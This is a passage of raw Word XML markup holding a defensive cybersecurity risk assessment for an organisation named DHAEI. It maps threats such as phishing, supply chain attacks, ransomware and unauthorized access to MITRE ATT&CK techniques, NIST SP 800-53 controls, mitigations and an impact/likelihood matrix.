        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Assessment Process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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The risk assessment framework is anchored on the NIST RMF stages:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Risk Identification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Utilizing MITRE ATT&amp;CK techniques and NIST National Vulnerability Database (NVD), DHAEI will assess risks to its critical assets.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Key Stakeholders</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">IT Manager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Leads IT risk assessment and vulnerability analysis.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">CISO (Paul Alexander)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Oversees risk mitigation and control implementation.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">SOC Team</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Monitors real-time alerts, identifies Indicators of Compromise (IoCs), and detects unusual activities.</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Vulnerabilities, Indicators of Compromise (IoCs), and Threats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Data Breach due to Phishing Attacks</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Weak email filtering or employees untrained in recognizing phishing.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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IoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Unusual outbound connections, access during off-hours.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Colonial Pipeline's 2021 breach began with phishing, compromising sensitive data.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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MITRE ATT&amp;CK Techniques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T1566 (Phishing)</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T1078 (Valid Accounts)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Implement multi-factor authentication (MFA), employee awareness training, and robust email filtering.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Risk Control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Implement NIST SP 800-53 controls for Access Control (AC-2, AC-3) and continuous email monitoring.</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Supply Chain Attack</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Limited vetting of third-party providers.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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IoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Access from unknown IPs, installation of suspicious software.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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SolarWinds supply chain attack (2020) affected numerous organizations.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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MITRE ATT&amp;CK Techniques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T1195 (Supply Chain Compromise)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Enforce zero-trust architecture, limit vendor access, and conduct regular third-party security audits.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Risk Control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use NIST SP 800-53 (SA-9) for supply chain risk management and Industry Canada’s supply chain security guidance.</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Ransomware Attack</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Lack of backup redundancy, unprotected endpoints.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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IoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Unexpected encryption activity, spikes in CPU/network usage.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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JBS Foods ransomware attack in 2021 halted production, affecting operations.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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MITRE ATT&amp;CK Techniques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T1486 (Data Encrypted for Impact)</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T1070 (Indicator Removal)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Regular backups, endpoint protection, and network segmentation.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Risk Control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use NIST SP 800-53 controls for contingency planning (CP-9) and SI-3 (Malicious Code Protection).</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Service Disruption</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>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Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Weak password policies, lack of MFA, insufficient monitoring.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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IoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Logins from unusual IPs or odd hours, repeated login failures.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Slack’s 2022 outage disrupted productivity and service continuity.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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MITRE ATT&amp;CK Techniques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T1499 – Endpoint Denial of Service (DoS)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T1071 – Application Layer Protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>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Mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Redundant VPN servers, load balancing, regular VPN health checks.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>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Risk Control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: NIST RMF’s resilience framework and MITRE ATT&amp;CK T1499 techniques to counter service disruptions.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Unauthorized Access</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>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Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Weak access control mechanisms or insider threats.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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IoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Unauthorized logins, high resource usage from suspicious processes.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Twitter’s 2020 insider attack revealed flaws in access control.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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MITRE ATT&amp;CK Techniques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T1078 – Valid Accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">T1189 – Drive-by Compromise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>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Mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Implement MFA, conduct regular permission audits, and restrict privilege escalation.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>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Risk Control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Align with NIST SP 800-53 access controls and Industry Canada guidelines for securing critical infrastructure.</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Risk Ownership Chain</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>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Ground Level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: IT staff perform initial monitoring and anomaly reporting.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>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Mid-Level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: IT Manager reviews reports, initiates preliminary containment actions.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>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Executive Level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: CISO and CEO authorize high-priority mitigations, ensuring alignment with corporate objectives.</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Impact and Likelihood Matrix</w:t>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2228"/>
        <w:gridCol w:w="1463"/>
        <w:gridCol w:w="1598"/>
        <w:gridCol w:w="2108"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="300"/>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Threat</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CIA Impact</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Impact (0-10)</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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Likelihood (0-5)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="515"/>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Data Breach (Phishing)</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Confidentiality</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9</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4</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="300"/>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Supply Chain Attack</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Integrity</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8</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3</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="300"/>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Ransomware Attack</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Availability</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10</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3</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="300"/>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Service Disruption</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Availability</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7</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3</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>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22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Unauthorized Access</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463"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Integrity</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159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6</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="000000" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="000000" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="20" w:type="dxa"/>
              <w:top w:w="20" w:type="dxa"/>
              <w:right w:w="20" w:type="dxa"/>
              <w:bottom w:w="20" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2108" w:type="dxa"/>
            <w:vAlign w:val="top"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
              </w:pBdr>
              <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Risk Acceptance Criteria</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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Risks with a score of 15 or higher are addressed immediately due to potential high impact. Lower-scoring risks are monitored but may not require immediate action, optimizing DHAEI’s resource allocation.</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Risk Treatment Based on NIST SP 800-53 and MITRE ATT&amp;CK Framework</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Data Breach</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>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Controls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Phishing simulations, endpoint detection and response (EDR), MFA.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>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Priority</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: High; breaches impact both reputation and regulatory compliance.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>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Frameworks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: NIST SP 800-53 (AC-2, AC-3), ISO 27001, MITRE ATT&amp;CK T1566 for phishing.</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Supply Chain Attack</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>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Controls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Third-party access control, vendor security audits, zero-trust.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>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Priority</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Medium; indirect access poses substantial risks.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
